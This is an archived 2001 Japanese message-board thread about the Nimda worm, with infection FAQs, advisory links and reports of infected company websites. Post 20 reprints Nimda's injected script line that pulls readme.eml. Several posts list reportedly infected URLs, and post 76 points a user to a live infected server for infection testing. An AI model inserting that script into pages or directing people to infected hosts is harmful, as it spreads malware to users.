1read 100read
2013年03月セキュリティ655: 「Nimda !! 」【その4】 (627) TOP カテ一覧 スレ一覧 2ch元 削除依頼
SoftEther ver2.0 (357)
SpyDefense 0.9.5.116 Beta (391)
拡張子.aviで感染するウイルスがあるんですが・・・ (338)
ハッキング系書物 (607)
Jetico Personal Firewall Part14 (344)
信者・自演・荒らしが酷いのでセキュ板にもIDが必要 (332)

「Nimda !! 」【その4】


1 :01/10/01 〜 最終レス :2012/05/20
鬱したな!!親父にも鬱された事無いのに!!

2 :
●前々々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
●前々スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●前スレ 「Nimda !! その産」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

3 :
●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/
日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm
ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

Samba における Nimda ワーム対策
http://www.samba.gr.jp/project/kb/J0/1/09.html

4 :
●ニムダはWin95/98系など一般のパソコンでは感染しないのですか?
します。
(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

5 :
●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある?(688)
あります。

●フォルダの設定でWeb表示(.JPGを選択と左側に寒ネイルが表示されるような)で感染サイトの.lnkファイル(お気に入りのこと)を選択す
ると? (460)
(463)
感染可能ブラウザの場合、選択(開くではない)だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。
(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
(IEが未対応だったので)
補足:.htmlなどのファイルでも同様と思われる

6 :
●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか?(698)
あります。
(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル(キャッシュファイル)にふれてしまうと場合によっては感染する。


●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全?(701)
(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない(感染する)

【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

7 :
FAQer君がんばってるね。

8 :
ご苦労さまです。

9 :
http://3403687705/

10 :
CodeRed も10月になっても消えませんね。

11 :
>>7
すいません、今回のコピペは>>1さんにお願いしちゃいました(^^ゞ
3では新しいFAQ項目も増えていないと思いますので・・。
>>1さん、ありがとうございますm(_ _)m

12 :
>1
お疲れさまー。
今度から、関連リンクやFAQは>>2-10の辺り・・・とやると
よろしいかもー。

13 :
>>10
CoderedIIは既に新種になっていたみたい。
http://japan.cnet.com/News/2001/Item/010828-3.html?rn

14 :
http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
で、WIN2K SP2のCD-ROMを頼んだ(24日9
今日届いた。
意外と早かったなぁ。

15 :
>>13
らしいねえ。CodeRedスレでも、10月になっても止まってないってカキコがあった。
まあ、世界中がまだ10月になったわけじゃないけど・・。

16 :
aplanem395@zzyffrz.com
からNimda付きメールが来たぞ。
McAfeeが捕まえた、入れてて良かった。

17 :
>>16
来るのかぁ<ニムダメール
このスレでの報告は初?

18 :
マジです。ソース書き込もうか?

19 :
>>18
できれば。

20 :

</body>が無いのでこれを書き換えてるのか?
ここから→
From aplanem395@zzyffrz.com Sun, 30 Sep 2001 06:23:47 -0700
Received: from [4.16.194.109] by hotmail.com (3.2) with ESMTP id ; Sun, 30 Sep 2001 06:22:42 -0700
Received:from rly7.fpf.slu.cz (rly7.fpf.slu.cz [172.31.109.14]); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
Received:from(209.156.84.66); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
X-Date: Sat, 29 Sep 2001 10:24:38
From: <aplanem395@zzyffrz.com>
Message-Id: <KbSmp24a.KFSm7i5IT4wlzYi.KtWmWi2C.KM5V7ueZO.KTJhqjq@rly7.fpf.slu.cz>
Subject: Get Rid Of Debt - Consolidate!
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Date: Sat, 29 Sep 2001 21:25:40

<html>
<head>
</head>
<body bgcolor="#ffffff" topmargin=2 leftmargin=5 rightmargin=5 marginwidth=5 marginheight=0 >
<div id="divMsgrObject" style="display:none"></div>
<p>
<s

<CENTER>
<table border=0 width=100% cellpadding=0 cellspacing=0 bgcolor="#000000">
<tr><td valign=top>
<pre>
</pre>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>CUT YOUR  MONTHLY DEBT
PAYMENTS IN HALF !</FONT></B>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff><i>EVERYONE QUALIFIES!</i></FONT></B></p>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>FREE PHONE CONSULTATION - NO
OBLIGATION!</p>
<P align="center"><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color='HotPink'>CLICK
</font></a></FONT><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color="HotPink" size="+3" face="Arial,Helvetica">HERE
FOR DETAILS!</font></a><P align="center"><a href="mailto:removes@web-advs.net"><font face="Arial,Helvetica" size="1" color="#FFFFFF">Click
Here To Be Removed</font></a></B><br>
<br>
</td></tr>
</table>
</form>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

←ここまで

21 :
>>20
これは若干違うもののような気がするな。
ワームが送ってきたメールとは思えない…
思うに、このメールの原文がDISK上にHTMLファイルで保存されてて
そこにNimdaが感染して、最下行を書き換えて、
Nimdaは駆除したけど(?)そのままになってたのを、
単純にSPAMで送ってきた、という機序なのではないかと。
メールで誘導してるURLのポートが81番つうのが怪しいんだが(w
どちらにせよ送信元が間抜けなのは間違いなかろう。

22 :
お騒がせしました。

23 :
>>22
いや、貴重なサンプルです。ありがとうございました。

24 :
その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

25 :
このスレと、にむだにはいろいろ勉強させてもらったよ・・。

26 :
http://www.bee.woodland.co.jp
駆除はしたみたいだけど、まだIIS/4.0なんだよなー

27 :
今日の夕刊フジにニムダが載っていますね。
流行後一段落後に新聞に載ったのは初?

28 :
あ゛っ
まだreadme.emlが残ってる。

29 :
>>26
いつ再感染するんかワクワク

30 :
>>28
http://www.bee.woodland.co.jp/readme.eml
だめぢゃん( ̄△ ̄;
なにやってんだよ。バックアップから上書きでリストアしただけか?
豪快なウイルス駆除法もあったもんだ・・。

31 :
http://www.zumensoft.co.jp/
ここは閉鎖中。
beeとどっちがさきにまともになるか。

32 :
>>31
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
Norton Antivirus2000がダメだって。。。。

33 :
>>32
はっきりいってやりたいのだが、ウイルススキャンソフトを実行して再起動するだけしかやらないなら、どのソフトだってダメだ<対にむだ

34 :
IE6で感染する事例が増えた原因がわかった・・。

IEで「.exe」などのファイルにアクセスすると、「ファイルのダウンロード」
という確認ダイアログウィンドウが現れるわけですが、IE 5のときは、
次の場所からファイルをダウンロードするように選択しました。
このファイルの処理方法
○ このプログラムを上記の場所から実行する
◎ このプログラムをディスクに保存する
[ OK ] [キャンセル]
というように、デフォルトはディスクへの保存となっていて、直接開くには、
二回のクリック(「上記の場所から」と「OK」)が必要でした。
それが、なんと、IE 6では、「開く」がデフォルトになってます。
キャプチャ画像(上がIE 6、下がIE 5)
http://java-house.etl.go.jp/~takagi/security/misc/ie6-filedownload-dialog.png
これって危な過ぎるような。ワンクリック手がすべるだけでドカンでしょう。

35 :
■『Nimda』、再襲来は不発
http://japan.cnet.com/News/2001/Item/011001-3.html?mn
『Nimda』(ニムダ)攻撃の第2波は失敗したようだ。Nimdaワームが28日
に再発するとセキュリティー企業は警告していたが、この懸念は現実の
もとはならなかった。最初の感染から10日後に活動を再開するとされて
いたが、10日後にあたる28日の朝、Nimdaの再襲来を告げる徴候はほと
んど見られなかった。

36 :
>>32
>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません
効き目がないというのは何を意味してるんだ?
自分がウイルスを助けるような操作をしても注意してくれないということか?

37 :
age

38 :
>>32
>な〜に寝ぼけたこと言ってるんですか。
>2ちゃんねるで晒されてまっせ。
>http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573
ワラタ&ユウキアル

39 :
>>38
にちゃんねらーにもいいひといるんだなぁ・・。

づめんそふとのヒトは前スレもみてくれるだろうか。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

40 :
>>34
そそ危険危険デフォルトが開くってなんとかならんかな。
デフォルトの変更方法求む

41 :
なんじゃこら>にむだの項
http://www.hh.iij4u.or.jp/~noguti/docs/gaihuu/9gatunikkikou.html

42 :
をいっ(^^;
http://www.d-link.co.jp/

43 :
予想通り再開せず
http://www.with9.com/

44 :
つーか、恥ずかしくないのかね。
看板に落書きされたようなもんだろう。
いつまでも閉鎖したままだったり、汚染されっぱなしで。
会社の看板もこうなのかね、こういう会社は。

45 :
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.advaoptical.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
http://pc2.autechs-unet.ocn.ne.jp
http://www.with9.com/

46 :
http://211.135.69.237/hoge
なんなんだよここはっ(><)

47 :
ns1.ojipack.co.jp
土曜にホームページに載ってたアドレスにメールした。
けど、今日になっても直してな〜い。

48 :
p4166-flets-adsl01osakakita.osaka.ocn.ne.jp
日本在住韓国人?

49 :
http://plaza12.mbn.or.jp/~kaiun/
なんだこりゃ

50 :
>>49
ワラタ

51 :
http://www.hyundaijapan.co.jp/
また鯖止めてるョ。

52 :
>>51
弐週間も何やってたんだ(--#

53 :
>>32
このヒトたちのカキコには最新パターンファイルにアップした形跡がないんだけど・・。

54 :
SP2収録された雑誌って発売されました?

55 :
nimda発生の頃から今までずっと鯖停止している会社は、
鯖がnimdaに汚染されて復旧できていない、とみなして良いのだろうか?
結構そういう会社があるのだが。
しかしそういうところは恥ずかしくないのかね。
>44の言う通りだよ。
きちんと管理できないなら最初から看板(サイト)なんて出さなければいいのに。

56 :
>>54
ttp://www.vwalker.com/news/0105/24_/24_190311.html
>なお,Windows2000SP2はDOS/Vmagazine 6月15日発売号のCD-ROMに収録予定。

57 :
厨房質問ですが、Nimdaに感染したサイト一覧をリアルタイムで出している処ってあります?
ご存じの方はおせーて┌(_ _)┐

58 :
>>57
逆にききたい。
ダイアルアップ非固定アドレスの感染者がいたらどうやって
リアルタイムでわかるんだい?

59 :
>>58
攻撃されれば分かる(w
ダミーのroot.exeとかredeme.exeとか作っておいとけ(ww

60 :
>>57
リアルタイムとは言えないかもしれないが、専用のニムダ晒しサイトはなくとも、一般のサービスでなぜか教えてくれるところがある。
アタマ使うなり、過去ログ読むなりするんだな。

61 :
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
ここのヒトは読んでくれたのかね。

62 :
>>57は最終的に何が知りたいのかわからんが、過去の感染サイトを巡回すると、経験上かなりの確率で再発してるぞ(w

63 :
>58
> ダイアルアップ非固定アドレスの感染者がいたらどうやって
> リアルタイムでわかるんだい?
もぉ〜ん、アタシ厨房なんです。揚げ足取られるとすぐ転んぢゃうんです。
訂正します。
ある程度まとまって、Nimda感染サイトを一覧できるところを教えてください。
目的は、IE6の動作を試してみたいんです。

64 :
>>58
ハア?
>>57の質問はリアルタイムって逝ってるんだから
攻撃されなきゃわかんないだろ。
それとも自分が攻撃されたらリアルタイムサイトも攻撃されてる
のか?(w
Nimda感染サイトは感染すると全世界のIPを攻撃してるのか?
それを踏まえてちょっとからかったんだよ。

65 :
>>58>>59でした。

66 :
>>65
過去ログ読め。

67 :
>>64
からかったつもりが自分の厨房ぶり晒してるぞ。

68 :
>>63 = >>57
繰り返しになるが、ダイアルアップの人が感染者なら
攻撃受ける前にすぐPC落としちゃったらそいつが感染者か
どうかわかんないだろ?
自分で鯖たててみるのが一番手っ取り早いと思う。
この板でしばしば取り上げてる「また感染してるのかよ」なサイト
はフレッシュアイで検索してるだけだと思われるが、この方法
だとIIS以外ででっちあげた自作自演サイトも区別しないので
おすすめしない(w

69 :
>>67
どこが?
リアルタイムで知るっていうことは、今現在の感染サイトの実数
を知りたいと解釈したが?
それを鯖たてればわかるといわれてもね
一部しかわかんないよ(w

70 :
>>65
過去ログに実数がわかるサイトなんてあったか?
見たおぼえないので示してください。
そんなサイトはありません。

71 :
また間違えたよ。鬱だし脳
57=64でなくて、58=64だよぉ

72 :
>>63
なんか>>63の質問の趣旨を理解できない厨房がいるようだが・・。
このスレの感染しているよ、と晒されているサイトはあたってみたのかい?>>63

73 :
>72
> このスレの感染しているよ、と晒されているサイトはあたってみたのかい?>>63
厨房でスマソ(;´Д`)
アタシ個人はいくつか逝ってみました。
何がやりたいかと云うと、私を含めて何人かで、OS再インストール予定マシンでIE6を試そーよと、ドキュソ計画を実行中なんです。
アタシはもう十分なんですが、アタシ以下の消防が感染サイトをきぼーん、ただしメールでURLを書いて送るな、バックアップした後もっぺんクリックしたら感染するだろーが、まとまった情報をながしている処をおせーろゴルァと責めるんです。
ここの「Nimda!!」1〜4を示したんですが、消防だからテメーで過去ログ読まないんです。
ぢゃあアタシが過去ログ読んで、それをまとめてアタシのホームページにアップするんかいと、今泣いているんです。
すみません、職人さんが集まっているところで、厨房がスレ汚したようです。
逝きます。

74 :
>>73
そうするとこのへんかねえ。
http://people.site.ne.jp/mirror2/Nimda/Nimda.txt
https://www.netsecurity.ne.jp/article/8/2923.html
https://www.netsecurity.ne.jp/article/9/2842.html
https://www.netsecurity.ne.jp/article/8/2874.html
https://www.netsecurity.ne.jp/article/8/2877.html
だが先週あたりまではまめに更新していたものの、今週は更新されてないし、
駆除・閉鎖されているところも多い。
(たぶん今も感染状態で開いているところはほとんどないはず。)
感染サイトは生もので、やはりというか当然というか普通は
晒されたら閉鎖・駆除をしてしまう。
73の趣旨からすると、現役感染サイトが知りたいのだろうから、
このスレをチエックして感染してるよ、となったらそれで動作確認、となるんだろう。
ただIE6はいくつかの条件で感染することがわかっているから、
実際に感染しているサイトで感染実験するのはあまり薦められないし、
そのうちひとつの条件で感染した・しないといってもあまり意味はないように
思う。

75 :
>74
> そうするとこのへんかねえ。
わぁをぅ、有り難うございます。
https://www.netsecurity.ne.jp/
ここからたどると、ある程度最新が判るんですね。
これで消防に逝ってもらいます。
> ただIE6はいくつかの条件で感染することがわかっているから、
> 実際に感染しているサイトで感染実験するのはあまり薦められないし、
> そのうちひとつの条件で感染した・しないといってもあまり意味はないように
> 思う。
アタシがやった時はWindows Media Playerが起ち上がったんですが、ダウンロードで開くがデフォルト選択状態を試したいと消防が駄駄捏ねるんです。ほかの*.exeではダメなんです。
ちなみに消防とは上司です。
さらにアタシの目的は、消防以下ばかりの会社のマシンからIE6を駆逐しておかないと、大変なことになるのを実証したいんです。
面倒かけました。

76 :
>>75
とりあえず感染サイト。
http://211.96.111.55/

77 :
>>73
>ただしメールでURLを書いて送るな、
>バックアップした後もっぺんクリックしたら感染するだろーが、
>まとまった情報をながしている処をおせーろゴルァと責めるんです
ここらへんがホント頭悪いよね。
別にフルアドレス書かなくてもいいじゃん。
例えば、211.96.111.55 これだけ書いて
http://自分で付けさせりゃ済む話だと思うが。
と言いつつ、おまけ。
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi

78 :
ありゃま。
http://z.nttec.edu.cn

79 :
http://www.d-plan.ne.jp/
readme.eml ダウンロードのスクリプトが2行あるのは
2回改竄されたってこと?
>快適ネットが自慢です!! 大きな信頼!! 低コストが魅力です!!
が売り物のネットワークサービス会社だが。。。

80 :
>>79
index.* には2種類の感染経路があるので
2行書かれてしまうみたいです。

81 :
eml その他を削除し、セキュ穴やバックドアも埋め、
パッチを当てているとしても、
Webのコンテンツにスクリプト残したままでそれを公開ってのは
結構見た目不細工だと思うのだが、みなさん平気なのかな。。
(このタイプのサイト結構ある)
よごれてない原本使ってかきもどせばよかろうに。

82 :
>>81
ヨソに作ってもらってるから原本がない(なくしちゃった)だったり(w
いや、けっこうあるんです、こういうとこ(苦笑

83 :
なるほど、ソースの最後にJavaScriptが空で残ってるサイトは
そういうことなのか(w

84 :
>>80
じゃあこれなんかは・・?
http://ns.ers.minato.tokyo.jp/

85 :
>>84
バックドアはあいてるね。
こんなマヌケな法案審議する暇あったらこういうのをなんとかしろ
http://www.mainichi.co.jp/digital/houan/01.html

86 :
http://www.zumensoft.co.jp/
復活したのか?やればできるじゃん?

87 :
>>86
と、思ったが
ページが見つかりません
のリンクがいくつもあるな。

88 :
>>84
12か?12もか?

<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

89 :
>>79
どうやらIISからApacheに変更したようだね。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.d-plan.ne.jp/

90 :
NimdaやCodeRedの影響で、IISから他のWebサーバに
乗り換えたサイトってどのくらいあるんだろう。
IISから他への移行って難しいことが多いみたいだ
けど。

91 :
>>90
>>86 とか?

92 :
>>91
違うような気がするが。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.zumensoft.co.jp/

93 :
>>92
あ、Web鯖だけを、ってことね。
ここはWindowsごとおっぽりなげた、と。

94 :
ちょっと聞いておくれよ。 さっき2ch見ててNimdaに感染しちゃったよ。
安置うぃるすで除去してくれたけどね。
IE6なんて役に立たないジャン。

95 :
IEはみなダメだよマイクロソフト
信じてはだめだよ。
アンチウィルスソフト入れてればわかるが
いれてない人は知らずに使用してると思うよ

96 :
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
この会社本当にアプリ開発してるんですか?
多分ユーザーにはパソコンに詳しい神様みたいな存在なんでしょうけどねー。
人間を観察するという立場で見れば興味あるサンプルではあるょ。

97 :
http://www.nt.sakura.ne.jp/~rose/

98 :
>>96
>2ちゃんえるというHPでワクチンを入手できるのですか?
再度ワラタ
かきこした人ちゃんと教えてやれ

99 :
>>95 そっかやっぱり
当分BSD使います。

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
危険SPAMメールサーバーのリスト (256)
フリーのアンチウイルスソフト最強決定戦! (832)
苺 き ん た ま (533)
SPYBLOCKER 良い!! (255)
一番可も不可もないセキュリティソフトは何? (400)
NOD32 ESS 【28xx ok complete】 (685)
--log9.info------------------
JR西日本(笑) (211)
『撮り鉄=クズ』というデマと戦うスレ 2 (369)
忍法テストスレ (389)
【可部線】レイルウェイ・ライター種村直樹スレッド86【復活】 (588)
【西】赤い青春18きっぷ44枚目【四】 (790)
JR北海道 ICカード乗車券「Kitaca(キタカ)」 12枚目 (257)
老舗【鉄道友の会】を発展させよう!…3.1 (205)
【撮り鉄】撮り鉄総合スレ【専用】 (459)
【♪】おんぷちゃんねるを見守るスレ28小節【♪】 (304)
【グモッ】人身事故スレ◆Part578【チュイーーン】 (1001)
なぜ、鉄ヲタに彼女ができないのか (249)
【千種】JR東海社員研修センター【三島】 (560)
鉄オタ気持ち悪すぎワロタwwwwwwww (259)
北海道&東日本パス PART35 (431)
なんで鉄ヲタってキモチワルイ人が多いの?7 (520)
【東京・大阪】近郊区間大回り乗車【交流会】 (715)
--log55.com------------------
飽きる銃、飽きない銃を挙げてみよう part3
UABR speedQB カマホモクイック 12
東京マルイガスガン総合 206
※※ これから行われる花火大会 11 ※※
いばらきまつり フィナーレ花火 5発目
全国花火大会 格付けスレッド 7
三国志 Three Kingdoms 【無断転載禁止】 8
【三戦板】 自治新党その363【新秩序】